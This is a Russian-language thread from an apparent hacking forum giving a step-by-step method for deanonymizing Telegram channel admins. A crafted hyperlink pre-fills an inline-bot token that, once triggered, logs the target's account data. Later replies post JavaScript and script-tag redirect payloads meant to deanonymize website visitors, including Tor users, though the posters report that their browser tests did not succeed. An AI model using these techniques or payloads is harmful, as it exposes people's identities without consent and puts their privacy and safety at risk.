• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга Деаноним админов телеграм каналов

Отслеживать

weakem

RAID-массив
Пользователь
Регистрация
30.10.2022
Сообщения
53
Реакции
24
Всем добрый день, сегодня я расскажу как деанонить админов
Предисловие:
В версии Telegram Desktop 4.16.6 добавили поддержку ссылок вида t.me/username?text=Hello для вставки заготовленного текста в поле ввода сообщения.
ВАЖНО! что в телеграм канале должна быть обратная связь(livegram и прочие боты для обратной связи)
@inlinequery_bot запускаем этого бота и он даст нам нашу ссылку которую мы будем использовать, или же запускаем своего благо есть сурсы https://github.com/marwq/telegram-deanon
Заходим в телеграм канал пишем что нибудь завлекающие например секрет
Выделяем наше слово и делаем гиперссылку
1714197286277.png

В эту гиперссылку вставляем то что дал нам бот
1714197392633.png

нажимаем создать и отправляем
после того как админ нажемт вашу ссылку к вам придет такой лог
1714197454348.png
 
Alternativer, Есть каналы где на обратную связь есть только боты, имея юзернейм уже можно разгуляться и парсить в каких беседах сидит человек да и в сервисы вбить, но тут главное чтобы сам бот для обратной связи поддерживал это форматирование )
 
Сделал такой код на JS

JavaScript: 
 function contactSite() {
            var username = "roped";
            var message = "@inlinequery_bot%token";

            // Create Telegram URL
            var telegramUrl = "tg://resolve?domain=" + username + "&text=" + encodeURIComponent(message);

Мобильные браузера на основе Chromiun вставляют текст Hello в поле сообщения.

Попробовал и нет, таким образом не получилось вытащить данные. Это было бы полезно, если можно создать редирект и получить данные пользователей.
 
Последнее редактирование:
Vulgar сказал(а):
Alternativer, Есть каналы где на обратную связь есть только боты, имея юзернейм уже можно разгуляться и парсить в каких беседах сидит человек да и в сервисы вбить, но тут главное чтобы сам бот для обратной связи поддерживал это форматирование )
Не знаю, ни разу не видел таких ботов для связи, скорее всегда используют альт аккаунты. Но такой способ тоже полезен, то, что кто то сделал пост об этом, это уже радует
 
Пожалуйста, обратите внимание, что пользователь заблокирован
hidden0 сказал(а):
В чём суть деанона? Узнать tg админа и его id в телеграм? Это теперь называется деанон?
Вот тоже не понял прикола)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Russian_Coder сказал(а):
Вот тоже не понял прикола)
ну как же ! Мефедрона жахнешь и поймешь смысл )))
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я по тестировал не много. В Яндекс мобильном браузере такой код откроется сразу при посещении веб страницы, остальные браузеры требуют подтверждения.
Код: 
<script>location.href = "https://t.me/roped?text=@inlinequery_bot%token";</script>
И деанонимизация получиться, если юзер закроет сообщение и оно сохраниться как черновик, потом снова откроет чат, тогда будет выполнен поиск и бот отправит данные юзера.

А вот такая конструкция кросс браузерная.

Код: 
 <script type="text/javascript">
        function contactSite() {
            var username = "roped";
            var message = "@inlinequery_bot%token"; // replace with your message (optional)

         
            var telegramUrl = "tg://resolve?domain=" + username + "&text=" + encodeURIComponent(message);

           
            setTimeout(function() {
                window.open(telegramUrl);
            }, 20);

          
            setTimeout(function() {
                location.href = "#";
            }, 20);
        }
    </script>
Но чтобы я не делал, не удалось обратиться к боту.
Для чего это надо ? Деанонимизация пользователей из браузера, когда ничего не известно IP скрыт, например с деанонить пользователя TOR


Если эту функцию не удалят, я еще посмотрю варианты редиректа с выполнением нулевого клика в телеграмме.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх